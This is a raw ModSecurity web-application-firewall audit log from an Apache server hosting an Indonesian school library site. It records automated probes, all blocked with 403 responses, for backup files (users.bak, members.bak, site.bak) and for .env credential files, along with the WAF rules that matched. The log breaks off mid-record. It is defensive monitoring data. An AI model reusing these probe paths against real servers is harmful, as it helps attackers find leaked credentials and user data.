--69e70f74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --69e70f74-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201958020 1830 (- - -) Stopwatch2: 1747683201958020 1830; combined=705, p1=317, p2=362, p3=0, p4=0, p5=25, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e70f74-Z-- --c9bff547-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oNgAAAEM 103.236.140.4 59608 103.236.140.4 8181 --c9bff547-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160563227 --c9bff547-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c9bff547-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201970512 2495 (- - -) Stopwatch2: 1747683201970512 2495; combined=968, p1=455, p2=478, p3=0, p4=0, p5=35, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9bff547-Z-- --07ba1f6f-A-- [20/May/2025:02:33:41 +0700] aCuHlTuVdcwZ_qZ5ZIoosQAAAAo 103.236.140.4 33644 103.236.140.4 8181 --07ba1f6f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 86.143.131.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 86.143.131.186 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --07ba1f6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07ba1f6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747683221473361 854 (- - -) Stopwatch2: 1747683221473361 854; combined=333, p1=299, p2=0, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07ba1f6f-Z-- --3999381e-A-- [20/May/2025:02:33:42 +0700] aCuHlgZaP57SewDBUi9oRQAAAEI 103.236.140.4 33662 103.236.140.4 8181 --3999381e-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 86.143.131.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 86.143.131.186 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --3999381e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3999381e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747683222532267 852 (- - -) Stopwatch2: 1747683222532267 852; combined=297, p1=257, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3999381e-Z-- --bdb1062e-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoouwAAAAg 103.236.140.4 33756 103.236.140.4 8181 --bdb1062e-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994953 --bdb1062e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bdb1062e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226914529 2630 (- - -) Stopwatch2: 1747683226914529 2630; combined=840, p1=413, p2=399, p3=0, p4=0, p5=27, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdb1062e-Z-- --784a7b63-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoovgAAAAU 103.236.140.4 33756 103.236.140.4 8181 --784a7b63-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757548 --784a7b63-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --784a7b63-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226930960 2185 (- - -) Stopwatch2: 1747683226930960 2185; combined=806, p1=402, p2=375, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --784a7b63-Z-- --904d2e43-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoovwAAABQ 103.236.140.4 33756 103.236.140.4 8181 --904d2e43-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.8.0) Gecko/20100101 Firefox/52.8.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994984 --904d2e43-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --904d2e43-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226946455 2072 (- - -) Stopwatch2: 1747683226946455 2072; combined=883, p1=402, p2=440, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904d2e43-Z-- --c0636471-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoowQAAAAo 103.236.140.4 33760 103.236.140.4 8181 --c0636471-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5; rv:57.0.3) Gecko/20100101 Firefox/57.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182392 --c0636471-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c0636471-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226953262 2176 (- - -) Stopwatch2: 1747683226953262 2176; combined=785, p1=425, p2=334, p3=0, p4=0, p5=26, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0636471-Z-- --0c6ab212-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoowwAAABE 103.236.140.4 33904 103.236.140.4 8181 --0c6ab212-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994993 --0c6ab212-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0c6ab212-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226954959 1890 (- - -) Stopwatch2: 1747683226954959 1890; combined=708, p1=327, p2=355, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c6ab212-Z-- --1ba3b04e-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooxQAAABY 103.236.140.4 33904 103.236.140.4 8181 --1ba3b04e-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757582 --1ba3b04e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1ba3b04e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226959257 1603 (- - -) Stopwatch2: 1747683226959257 1603; combined=683, p1=331, p2=325, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ba3b04e-Z-- --c5646705-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooyAAAAAA 103.236.140.4 33904 103.236.140.4 8181 --c5646705-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995000 --c5646705-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5646705-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226971486 1739 (- - -) Stopwatch2: 1747683226971486 1739; combined=667, p1=324, p2=316, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5646705-Z-- --abe93623-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooyQAAAAE 103.236.140.4 33904 103.236.140.4 8181 --abe93623-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182413 --abe93623-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --abe93623-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226975999 1930 (- - -) Stopwatch2: 1747683226975999 1930; combined=750, p1=363, p2=359, p3=0, p4=0, p5=27, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abe93623-Z-- --3d8be701-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooygAAABI 103.236.140.4 33902 103.236.140.4 8181 --3d8be701-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530712 --3d8be701-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d8be701-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226977203 1807 (- - -) Stopwatch2: 1747683226977203 1807; combined=767, p1=412, p2=316, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d8be701-Z-- --ad95b00b-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooywAAAAs 103.236.140.4 33760 103.236.140.4 8181 --ad95b00b-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995013 --ad95b00b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad95b00b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226977933 1674 (- - -) Stopwatch2: 1747683226977933 1674; combined=635, p1=303, p2=283, p3=0, p4=0, p5=49, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad95b00b-Z-- --5a7ccc1c-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoozgAAAAk 103.236.140.4 33760 103.236.140.4 8181 --5a7ccc1c-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871703 --5a7ccc1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5a7ccc1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226981687 1857 (- - -) Stopwatch2: 1747683226981687 1857; combined=778, p1=455, p2=295, p3=0, p4=0, p5=28, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a7ccc1c-Z-- --82dccf64-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoo0AAAAAQ 103.236.140.4 33760 103.236.140.4 8181 --82dccf64-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152633389 --82dccf64-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --82dccf64-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226984984 1774 (- - -) Stopwatch2: 1747683226984984 1774; combined=718, p1=336, p2=356, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82dccf64-Z-- --ff17eb71-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo0wAAAAM 103.236.140.4 33760 103.236.140.4 8181 --ff17eb71-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700161 --ff17eb71-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ff17eb71-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227000393 1630 (- - -) Stopwatch2: 1747683227000393 1630; combined=643, p1=316, p2=299, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff17eb71-Z-- --edd2a507-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1AAAABg 103.236.140.4 33760 103.236.140.4 8181 --edd2a507-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: 